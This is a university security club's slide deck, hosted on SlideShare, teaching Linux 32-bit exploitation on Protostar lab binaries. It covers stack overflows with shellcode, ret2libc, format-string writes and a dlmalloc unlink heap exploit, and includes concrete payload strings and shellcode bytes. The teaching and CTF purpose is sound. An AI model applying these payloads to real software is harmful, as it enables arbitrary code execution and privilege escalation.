SlideShare uma empresa Scribd logo

Linux 32-bit Exploitation Crash Course

UTD Computer Security Group
UTD Computer Security Group

This document provides an introduction to software exploitation on Linux 32-bit systems. It covers common exploitation techniques like buffer overflows, format strings, and ret2libc attacks. It discusses the Linux memory layout and stack structure. It explains buffer overflows on the stack and heap, and how to leverage them to alter control flow and execute arbitrary code. It also covers the format string vulnerability and how to leak information or write to arbitrary memory locations. Tools mentioned include GDB, exploit-exercises, and Python. Overall it serves as a crash course on the basic techniques and concepts for Linux exploitation.

Tecnologia
1 de 84
Baixar para ler offline
EXPLOITATION CRASH COURSE UTD Computer Security Group – Scott Hand www.utdcsg.org
Introduction
What we will cover  We are covering software exploitation in a Linux 32-bit environment  Topics  Buffer overflows (stack and heap)  Format string  Ret2libc
Tools  Virtualization software  VMware Workstation or VMware Player (free)  Virtualbox (free)  Linux Environment  GDB  Editor (Vim, emacs, etc.)  Python
Exploit-Exercises - Protostar  Great learning environment  Stack, heap, format string, etc. vulnerabilities  Can be downloaded and run from VMware or Virtualbox
x86 Background
Linux Memory Structure  .text  Contains program instructions  Readable, executable, not writable  Heap  Contains dynamically allocated memory objects  Readable, writable, (usually) executable  Stack  Contains static variables and base pointers  Readable, writable, (sometimes) executable
Stack  Grows down from 0xBFFFFFFF  Argv, Environment, and Auxiliary Vectors at base Stack Heap 0xbfffffff
Stack Frame Contents of Stack Contents of Stack Stack Base (EBP) Stack Pointer (ESP)
Common Register Conventions  ESP – Stack Pointer  EBP – Stack Frame Base Pointer  EIP – Instruction Pointer  EAX, EBX, ECX, EXD – Fairly widely used, often used as function arguments
Function Calls  The x86 instruction CALL is used, which automatically does the following:  Put all the arguments onto the stack (right to left)  Put instruction pointer (EIP) onto stack  Now in the callee, push base pointer onto stack and set base pointer to stack pointer (function prologue)  Execute instructions in new function  Clean up locals  Set stack pointer to base and restore base pointer by popping the stack (function epilogue)
Function Calls Visualized  Function A has a stack comprised of a base, contents, and a top (stack pointer) ESP EBP Stack Contents A Base A
Function Calls Visualized  Function A calls Function B, so pushes its arguments and instruction pointer on the stack ESP Stack Contents A Base A EIP for A Arguments for B EBP
Function Calls Visualized  Function B executes its prologue to set up its own stack frame. First, push the old EBP EBP for A Stack Contents A Base A EIP for A Arguments for B ESP EBP
Function Calls Visualized  Now change EBP to ESP’s value. We have a new stack frame ESPEBPEBP for A Stack Contents A Base A EIP for A Arguments for B
Function Calls Visualized  Function B sets up its own locals EBP EBP for A Stack Contents A Base A EIP for A Arguments for B Stack Contents B ESP
Function Calls Visualized  On finishing, function B first cleans up locals EBP for A Stack Contents A Base A EIP for A Arguments for B ESPEBP
Function Calls Visualized  Next, it enters its function epilogue, in which it restores the previous base pointer Stack Contents A Base A EIP for A Arguments for B EBP ESP
Function Calls Visualized  Finally, the EIP is popped and execution continues at its location Stack Contents A Base A Arguments for B EBP ESP
Function Calls Visualized  A does the rest of the cleanup Stack Contents A Base A EBP ESP
Stack Based Buffer Overflows
Overview  Stack based buffer overflows occur when writing goes past the boundaries of local variables  Example: char buf[64]; strcpy(buf, argv[1]);  The previous example will overflow buf’s boundaries and write onto stack memory if argv[1] contains more than 64 bytes  This allows us to alter local variables and also change the execution of the program
Altering Code Execution Flow  Since we can write over stack memory, we can write over the saved EIP address Stored EIP Stored EBP buf[64] Paddin g New EIP
Demos – Stack1 through Stack4
Stack Smashing  Now we want to achieve execution of arbitrary code  Instead of giving EIP the address of another function, we give it the address of our buffer  Our buffer contains machine code instructions (known as shellcode)  For reliability, we use 0x90 opcodes to pad before our shellcode, these are NOP instructions and execution will slide past them if it lands there
Stack Smashing Illustrated buf[64] EBP EIP Shellcode NOP Sled Evil Pointer
Demo – Stack Smashing
Ret2libc
Overview  What happens if we’re working with a slightly more modern machine with non- executable stack memory?  Rather than write our own code to spawn a shell, let’s use libc!  We will use system() for the demonstration for simplicity, but bear in mind that system drops privileges, so execv() is needed for privilege escalation
Payload buf[64] EBP EIP Padding system() exit() Pointer to “/bin/sh”
Where to put “/bin/sh”?  In buffer, after its address  Environment  Argv  Auxiliary Vectors  Anywhere else reliable
Demo – Ret2libc
Format String
Background  printf() and similar format string functions such as sprintf() are used for string interpolation in many languages including C  Intended use:  Give a string containing text and format flags  Format flags are replaced with arguments to printf  Example: printf(“%d %dn”, 3, 3+4); // Prints 3 7
What could go wrong?  How are user provided strings printed?  Good: printf(“%s”, str);  Bad: printf(str);  Why is this important? The user could supply their own format flags and your program will trust it.  GCC will give a very stern warning if you try to do this
What can we do with this?  Giving lots of flags will mean that variables will be pulled from the stack – even if they weren’t passed to printf  This leads to information leakage.  Lets look at an example…
sf.c #include <stdio.h> int main(int argc, char *argv[]) { int a = 0xDEADBEEF; int b = 0xABCDABCD; int c = 0x12345678; printf(argv[1]); printf("n"); return 0; }
sf.c Exploited  ./sf AAAA  Output: AAAA  ./sf AAAA%x  Output: AAAAb7fd7ff4  ./sf AAAA%x%x%x%x%x  Output: AAAAb7fd7ff48048450bffff7e8b7ec6365de adbeef
sf.c Exploited  There one of the local variables. Is there an easier way?  ./sf AAAA%5$x  Output: AAAAdeadbeef  ./sf AAAA%6$x  Output: AAAAabcdabcd
It gets worse  One of the flags, %n, has the following effect:  The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.  So now we can write where ever we want!  What’s the process?  First, put the address to write to in the payload  Increment the number of characters written using the %x flag with a number. Ex: %10x prints ten spaces.  Call %n on the appropriate stack byte containing the pointer  Repeat
Example with sf.c – Finding offsets  Modified sf.c checks if a==c, so 0xabcdabcd needs to be replaced with 0xdeadbeef  First, find how many %x flags needed to reach your payload on the stack.  With our python harness to keep environment constant, we get 107  Looking in GDB gives an address of 0xbffffe58 for the the value 0xabcdabcd
Example with sf.c – Calculations  The last byte should be 0xEF (239)  We’ve written 5 bytes (4 and the spam one we’re crafting), so we want to write 234 more  Due to having to pad our string with As to line the address up, our payload now looks like: x58xfexffxbfA%234x%108$n  Running this confirms that now there’s a 0x000000ef where 0xabcdabcd was  What now?
Example with sf.c – 2 at a time  We could write the last byte, then the one before, and so on. This takes four writes, so it wastes shell code space. It clobbers the preceding byte, but we probably don’t care too much  Example: 00000000000000ef Wrote 0xEF 000000000000beef Wrote 0xBE 0000000000adbeef Wrote 0xAD 00000000deadbeef Wrote 0xDE
Example with sf.c – Using hc  Luckily, adding h in front of n writes a 16-bit integer instead  For 0xdeadbeef, that means two writes. Increment by 48874, write the 0xbeef half, then increment that by 8126 to write the 0xdead half.  This all gets a bit messy and the addresses will start to shift around depending on the length of the exploit, so use a script to pad it to the same length every time.
Example with sf.c – Script  After having to tweak addresses again, final payload building script: payload = “x38xfexffxbfx3axfexffxbfA%48870x%108$hn%8126x %109$hn” payload += "A" * (40 - len(sploit)) print payload  Running it, we see in gdb that we were successful, and we also get the victory message.
Other nefarious uses  Overwrites return addresses  Overwrites GOT entries  Overwrite terminators to cause overflow  Write shellcode to non-stack memory  Leaking information to bypass ASLR
Demo – Echoserver Format String
Heap Based Overflows
Heap Overview  We learned about the stack. Programs store local variables there.  Heaps are for storing globals as well as variables too large for the stack  In Linux:  .data – Initialized globals  .bss – Uninitialized globals  Heap – Dynamically allocated space, grows upwards  Stack – Local variables, grows down
Memory Allocation Data Structures  glibc uses a version of the popular dlmalloc algorithm  Memory is allocated in chunks. Each chunk is 8-byte aligned with a header and data.  Each chunk contains:  Size information before and after the chunk – Easy to combine chunks and allows bidirection traversal from any chunk. Trailer fields are sometimes omitted in recent implementations  Chunks are stored in a linked list of bins, sorted by size in continuous increments of 8 for sizes under 512. Over 512 can be any multiple of 8.  Upon freeing a chunk, it is combined with freed neighbors to lower fragmentation  The final “top” chunk is empty and its size records the remaining about of free space
Binning Size: 16 Size: 24 Size: 32 Size: 512 Size: 576 Size: 231 … … Chunk 1 Chunk 2 Chunk 3 Chunk 4 Chunk 5
Some Consequences  Locality Preservation  Chunks allocated at the same time tend to be referenced similarly and have coexistent lifetimes  Important for good performance, reduces cache misses  A tweaked version of nearest-fit is used that results in consecutive blocks when there is space  This is good for us  Easy to create overflows, as memory allocated after vulnerable variables is often given to other variables nearby that may be for things such as function pointers or file paths
Malloc Example  We want to see what the heap looks like as more memory is allocated  We will allocate three strings: a, b, c. Each is 32 bytes.  Code: char *a, *b, *c; a = malloc(32); b = malloc(32); c = malloc(32);  This will serve as an introduction to the heap3 problem
First Allocation 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a Remaining Space: 0xFD9
Second Allocation 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 32 Byte Data Chunk 2 b Remaining Space: 0xFB1
Third Allocation 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 32 Byte Data Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 32 Byte Data Chunk 3 c Remaining Space: 0xF89
 Now, the interesting (and exploitable) part involves the free() implementation in dlmalloc  Let’s examine the contents of memory after successive free() commands are executed.  Code: free(c); free(b); free(a); Free Example
Before First Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “CCCC0” Chunk 3 c Remaining Space: 0xF89
After First Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
After Second Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
After Third Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “0x0804c028” Chunk 1 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
Demos – Protostar Heap Problems
Heap3  We know from Heap3’s description that it “introduces the Doug Lea Malloc (dlmalloc) and how heap meta data can be modified to change program execution.”  What metadata in particular?  Let’s review the process of freeing a chunk from the last presentation…
Before First Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “CCCC0” Chunk 3 c Remaining Space: 0xF89
After First Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
After Second Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
After Third Free 0x0804c000 8 Byte Size – 0x29 0x0804c008 “0x0804c028” Chunk 1 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
Free Algorithm on Chunk p 1. Load the chunk’s size as psize, previous chunk is p-psize 2. A few scenarios can occur, but what we’re interested in is the case in which the surrounding chunk is also free 3. To consolidate, call: unlink(nextchunk, bck, fwd)
unlink(P, BK, FD) - Highlights … FD = P->fd; BK = P->bk; … FD->bk = BK; BK->fd = FD; …
Disassembled… 0x80498fa <free+214>: mov edx,DWORD PTR [ebp-0x18] 0x80498fd <free+217>: mov DWORD PTR [eax+0xc],edx 0x8049900 <free+220>: mov eax,DWORD PTR [ebp-0x18] 0x8049903 <free+223>: mov edx,DWORD PTR [ebp-0x14] 0x8049906 <free+226>: mov DWORD PTR [eax+0x8],edx The underlined instructions correspond with the previous two lines in unlink. bk is 12 bytes offset, fd is 8 bytes offset.
Exploit Idea  We overwrite the size information for our b pointer, so that when it tries to find the previous memory chunk (previously c), we point it elsewhere.  Giving it a negative size means it will go forward to a “fake” previous chunk with fd and bk of our choosing.
Crafting the Fake Chunk  Give a size of 0xFFFFFFFC = -4 to chunk 2  This pushes it forward 4 bytes, so it will then look to b+16 for the bk pointer and b+12 for the forward pointer.  Adjusting for header, that means fd and bk will be 4 and 8 bytes into our body respectively  chunk2 = “BBBB”+word1+word2+”B”*20
What Now?  So now we can:  Load word1’s address into the memory at location word2 + 8  Load word2’s address into the memory at location word1 + 12  Actually pretty restrictive, as word1 and word2 need to be able to serve as a pointer to a writable region as well as data to write
Ideas  One word is the address of winner() – 12, the other is the stored EIP  Doesn’t work – We can’t write at winner() – 12   Overwrite the GOT entry for puts  Still doesn’t work. Any time we are trying to put winner()’s address somewhere, we can’t because that memory is not writable
Better Idea  One word will be a pointer to stack memory, the other will be a pointer to the stored EIP  Both locations are writable  Our stack is executable, and our program arguments are there. Let’s just overflow chunk 3’s contents to store the payload.  Exploit strategy:  Hijack EIP and send it to the heap  Execute custom shellcode that goes to winner()  Victory!
Writing the Shellcode  All we want our shellcode to do is jump to winner() and exit cleanly  There are some space considerations. Because of the double write, one byte gets clobbered after 16 bytes  Some trial-and-error shows that winner() returns to a location that’s under ESP in the stack as soon as our shellcode begins execution
Payload Pseudocode  Pop the stack  Push original stored EIP  Push winner  Return Why do we push original stored EIP? It’s nice to avoid segfaulting when we can.
Payload ASM Code POP eax PUSH 0xb7eadc76 PUSH 0x8048864 RET (Note: Your addresses may vary)
Payload Shellcode “ x58x68x76xdcxeaxb7 ” . x68x64x88x04x08xc3 ” I used metasm for this. Does its work in 12 bytes.
Slightly Nicer Shellcode  Something I use since originally giving the Heap3 presentation is the 0xEB opcode. It takes a single byte and jumps that far ahead.  So EB 06 would skip ahead 1 byte (and a half for the other half of this byte)
Results Starting program: /opt/protostar/bin/heap3 `python ~/solutions/h3.py` dynamite failed? that wasn't too bad now, was it? @ 1329993598 Program exited with code 056.
Conclusion
Future Reading  We didn’t cover any Windows exploitation. If you want to learn the tools and techniques for the Windows environment, check out the Corelan tutorials at: https://www.corelan.be/index.php/2009/07/19/ex ploit-writing-tutorial-part-1-stack-based-over flows /  We covered Ret2libc, but the next step in mitigation evasion, Return Oriented Programming (ROP) wasn’t covered. It’s worth it to read up on this, as it’s complex, but extremely powerful.
Thanks for coming  Let me know if there are any questions  The next CSG Crash Course will cover Cryptography and will be at 2pm on September 22 in ECSS 2.415  Weekly meetings are 7pm on Wednesdays in ECSS 4.619  Come join one of our teams for the upcoming CSAW2012 Capture the Flag competition and put these skills to use

Recomendados

Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacksn|u - The Open Security Community
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROPSaumil Shah
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingSaumil Shah
 
Runtime Symbol Resolution
Runtime Symbol ResolutionRuntime Symbol Resolution
Runtime Symbol ResolutionKen Kawamoto
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
Klee and angr
Klee and angrKlee and angr
Klee and angrWei-Bo Chen
 
Triton and symbolic execution on gdb
Triton and symbolic execution on gdbTriton and symbolic execution on gdb
Triton and symbolic execution on gdbWei-Bo Chen
 
Something About Dynamic Linking
Something About Dynamic LinkingSomething About Dynamic Linking
Something About Dynamic LinkingWang Hsiangkai
 

Recomendados

Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacksn|u - The Open Security Community
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROPSaumil Shah
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingSaumil Shah
 
Runtime Symbol Resolution
Runtime Symbol ResolutionRuntime Symbol Resolution
Runtime Symbol ResolutionKen Kawamoto
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
Klee and angr
Klee and angrKlee and angr
Klee and angrWei-Bo Chen
 
Triton and symbolic execution on gdb
Triton and symbolic execution on gdbTriton and symbolic execution on gdb
Triton and symbolic execution on gdbWei-Bo Chen
 
Something About Dynamic Linking
Something About Dynamic LinkingSomething About Dynamic Linking
Something About Dynamic LinkingWang Hsiangkai
 
CNIT 127: Ch 3: Shellcode
CNIT 127: Ch 3: ShellcodeCNIT 127: Ch 3: Shellcode
CNIT 127: Ch 3: ShellcodeSam Bowne
 
S1 DML Syntax and Invocation
S1 DML Syntax and InvocationS1 DML Syntax and Invocation
S1 DML Syntax and InvocationArvind Surve
 
Perl Programming - 01 Basic Perl
Perl Programming - 01 Basic PerlPerl Programming - 01 Basic Perl
Perl Programming - 01 Basic PerlDanairat Thanabodithammachari
 
LeFlowを調べてみました
LeFlowを調べてみましたLeFlowを調べてみました
LeFlowを調べてみましたMr. Vengineer
 
Compiler Construction | Lecture 15 | Memory Management
Compiler Construction | Lecture 15 | Memory ManagementCompiler Construction | Lecture 15 | Memory Management
Compiler Construction | Lecture 15 | Memory ManagementEelco Visser
 
Unit 1-introduction to perl
Unit 1-introduction to perlUnit 1-introduction to perl
Unit 1-introduction to perlsana mateen
 
Triton and Symbolic execution on GDB@DEF CON China
Triton and Symbolic execution on GDB@DEF CON ChinaTriton and Symbolic execution on GDB@DEF CON China
Triton and Symbolic execution on GDB@DEF CON ChinaWei-Bo Chen
 
06 - ELF format, knowing your friend
06 - ELF format, knowing your friend06 - ELF format, knowing your friend
06 - ELF format, knowing your friendAlexandre Moneger
 
Yacc lex
Yacc lexYacc lex
Yacc lex915086731
 
20160520 what youneedtoknowaboutlambdas
20160520 what youneedtoknowaboutlambdas20160520 what youneedtoknowaboutlambdas
20160520 what youneedtoknowaboutlambdasshinolajla
 
LD_PRELOAD Exploitation - DC9723
LD_PRELOAD Exploitation - DC9723LD_PRELOAD Exploitation - DC9723
LD_PRELOAD Exploitation - DC9723Iftach Ian Amit
 
System Programming and Administration
System Programming and AdministrationSystem Programming and Administration
System Programming and AdministrationKrasimir Berov (Красимир Беров)
 
Scientific Python
Scientific PythonScientific Python
Scientific PythonEueung Mulyana
 
Treasure Data Summer Internship 2016
Treasure Data Summer Internship 2016Treasure Data Summer Internship 2016
Treasure Data Summer Internship 2016Yuta Iwama
 
あなたのScalaを爆速にする7つの方法
あなたのScalaを爆速にする7つの方法あなたのScalaを爆速にする7つの方法
あなたのScalaを爆速にする7つの方法x1 ichi
 
Lexyacc
LexyaccLexyacc
LexyaccHina Tahir
 
C++ io manipulation
C++ io manipulationC++ io manipulation
C++ io manipulationPedro Hugo Valencia Morales
 
Alp 05
Alp 05Alp 05
Alp 05gswapnil86
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredKory Kyzar
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit developmentPayampardaz
 
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van KetwichCreating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van KetwichWillem van Ketwich
 
05_Return_to_Libc.pdf
05_Return_to_Libc.pdf05_Return_to_Libc.pdf
05_Return_to_Libc.pdfTesterteste3
 

Mais conteúdo relacionado

Mais procurados

CNIT 127: Ch 3: Shellcode
CNIT 127: Ch 3: ShellcodeCNIT 127: Ch 3: Shellcode
CNIT 127: Ch 3: ShellcodeSam Bowne
 
S1 DML Syntax and Invocation
S1 DML Syntax and InvocationS1 DML Syntax and Invocation
S1 DML Syntax and InvocationArvind Surve
 
LeFlowを調べてみました
LeFlowを調べてみましたLeFlowを調べてみました
LeFlowを調べてみましたMr. Vengineer
 
Compiler Construction | Lecture 15 | Memory Management
Compiler Construction | Lecture 15 | Memory ManagementCompiler Construction | Lecture 15 | Memory Management
Compiler Construction | Lecture 15 | Memory ManagementEelco Visser
 
Unit 1-introduction to perl
Unit 1-introduction to perlUnit 1-introduction to perl
Unit 1-introduction to perlsana mateen
 
Triton and Symbolic execution on GDB@DEF CON China
Triton and Symbolic execution on GDB@DEF CON ChinaTriton and Symbolic execution on GDB@DEF CON China
Triton and Symbolic execution on GDB@DEF CON ChinaWei-Bo Chen
 
06 - ELF format, knowing your friend
06 - ELF format, knowing your friend06 - ELF format, knowing your friend
06 - ELF format, knowing your friendAlexandre Moneger
 
20160520 what youneedtoknowaboutlambdas
20160520 what youneedtoknowaboutlambdas20160520 what youneedtoknowaboutlambdas
20160520 what youneedtoknowaboutlambdasshinolajla
 
LD_PRELOAD Exploitation - DC9723
LD_PRELOAD Exploitation - DC9723LD_PRELOAD Exploitation - DC9723
LD_PRELOAD Exploitation - DC9723Iftach Ian Amit
 
Treasure Data Summer Internship 2016
Treasure Data Summer Internship 2016Treasure Data Summer Internship 2016
Treasure Data Summer Internship 2016Yuta Iwama
 
あなたのScalaを爆速にする7つの方法
あなたのScalaを爆速にする7つの方法あなたのScalaを爆速にする7つの方法
あなたのScalaを爆速にする7つの方法x1 ichi
 

Mais procurados (18)

CNIT 127: Ch 3: Shellcode
CNIT 127: Ch 3: ShellcodeCNIT 127: Ch 3: Shellcode
CNIT 127: Ch 3: Shellcode
 
S1 DML Syntax and Invocation
S1 DML Syntax and InvocationS1 DML Syntax and Invocation
S1 DML Syntax and Invocation
 
Perl Programming - 01 Basic Perl
Perl Programming - 01 Basic PerlPerl Programming - 01 Basic Perl
Perl Programming - 01 Basic Perl
 
LeFlowを調べてみました
LeFlowを調べてみましたLeFlowを調べてみました
LeFlowを調べてみました
 
Compiler Construction | Lecture 15 | Memory Management
Compiler Construction | Lecture 15 | Memory ManagementCompiler Construction | Lecture 15 | Memory Management
Compiler Construction | Lecture 15 | Memory Management
 
Unit 1-introduction to perl
Unit 1-introduction to perlUnit 1-introduction to perl
Unit 1-introduction to perl
 
Triton and Symbolic execution on GDB@DEF CON China
Triton and Symbolic execution on GDB@DEF CON ChinaTriton and Symbolic execution on GDB@DEF CON China
Triton and Symbolic execution on GDB@DEF CON China
 
06 - ELF format, knowing your friend
06 - ELF format, knowing your friend06 - ELF format, knowing your friend
06 - ELF format, knowing your friend
 
Yacc lex
Yacc lexYacc lex
Yacc lex
 
20160520 what youneedtoknowaboutlambdas
20160520 what youneedtoknowaboutlambdas20160520 what youneedtoknowaboutlambdas
20160520 what youneedtoknowaboutlambdas
 
LD_PRELOAD Exploitation - DC9723
LD_PRELOAD Exploitation - DC9723LD_PRELOAD Exploitation - DC9723
LD_PRELOAD Exploitation - DC9723
 
System Programming and Administration
System Programming and AdministrationSystem Programming and Administration
System Programming and Administration
 
Scientific Python
Scientific PythonScientific Python
Scientific Python
 
Treasure Data Summer Internship 2016
Treasure Data Summer Internship 2016Treasure Data Summer Internship 2016
Treasure Data Summer Internship 2016
 
あなたのScalaを爆速にする7つの方法
あなたのScalaを爆速にする7つの方法あなたのScalaを爆速にする7つの方法
あなたのScalaを爆速にする7つの方法
 
Lexyacc
LexyaccLexyacc
Lexyacc
 
C++ io manipulation
C++ io manipulationC++ io manipulation
C++ io manipulation
 
Alp 05
Alp 05Alp 05
Alp 05
 

Semelhante a Linux 32-bit Exploitation Crash Course

Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredKory Kyzar
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit developmentPayampardaz
 
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van KetwichCreating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van KetwichWillem van Ketwich
 
05_Return_to_Libc.pdf
05_Return_to_Libc.pdf05_Return_to_Libc.pdf
05_Return_to_Libc.pdfTesterteste3
 
Advanced procedures in assembly language Full chapter ppt
Advanced procedures in assembly language Full chapter pptAdvanced procedures in assembly language Full chapter ppt
Advanced procedures in assembly language Full chapter pptMuhammad Sikandar Mustafa
 
Post exploitation techniques on OSX and Iphone, EuSecWest 2009
Post exploitation techniques on OSX and Iphone, EuSecWest 2009Post exploitation techniques on OSX and Iphone, EuSecWest 2009
Post exploitation techniques on OSX and Iphone, EuSecWest 2009Vincenzo Iozzo
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick reviewCe.Se.N.A. Security
 
Planet of the AOPs
Planet of the AOPsPlanet of the AOPs
Planet of the AOPsJames Ward
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on LinuxSam Bowne
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on LinuxSam Bowne
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxSam Bowne
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Elvin Gentiles
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJapneet Singh
 
cPanelCon 2015: InnoDB Alchemy
cPanelCon 2015: InnoDB AlchemycPanelCon 2015: InnoDB Alchemy
cPanelCon 2015: InnoDB AlchemyRyan Robson
 

Semelhante a Linux 32-bit Exploitation Crash Course (20)

Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly Required
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
 
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van KetwichCreating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
 
05_Return_to_Libc.pdf
05_Return_to_Libc.pdf05_Return_to_Libc.pdf
05_Return_to_Libc.pdf
 
Advanced procedures in assembly language Full chapter ppt
Advanced procedures in assembly language Full chapter pptAdvanced procedures in assembly language Full chapter ppt
Advanced procedures in assembly language Full chapter ppt
 
Buffer overflow attack
Buffer overflow attackBuffer overflow attack
Buffer overflow attack
 
Post exploitation techniques on OSX and Iphone, EuSecWest 2009
Post exploitation techniques on OSX and Iphone, EuSecWest 2009Post exploitation techniques on OSX and Iphone, EuSecWest 2009
Post exploitation techniques on OSX and Iphone, EuSecWest 2009
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
Planet of the AOPs
Planet of the AOPsPlanet of the AOPs
Planet of the AOPs
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
Return Oriented Programming
Return Oriented ProgrammingReturn Oriented Programming
Return Oriented Programming
 
test
testtest
test
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on Linux
 
The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer Overflows
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
 
Software Exploitation Techniques by Amit Malik
Software Exploitation Techniques by Amit MalikSoftware Exploitation Techniques by Amit Malik
Software Exploitation Techniques by Amit Malik
 
7986-lect 7.pdf
7986-lect 7.pdf7986-lect 7.pdf
7986-lect 7.pdf
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
cPanelCon 2015: InnoDB Alchemy
cPanelCon 2015: InnoDB AlchemycPanelCon 2015: InnoDB Alchemy
cPanelCon 2015: InnoDB Alchemy
 

Mais de UTD Computer Security Group

UTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domainUTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domainUTD Computer Security Group
 

Mais de UTD Computer Security Group (20)

Py jail talk
Py jail talkPy jail talk
Py jail talk
 
22S kickoff 2.0 (kickoff + anonymity talk)
22S kickoff 2.0 (kickoff + anonymity talk)22S kickoff 2.0 (kickoff + anonymity talk)
22S kickoff 2.0 (kickoff + anonymity talk)
 
Cloud talk
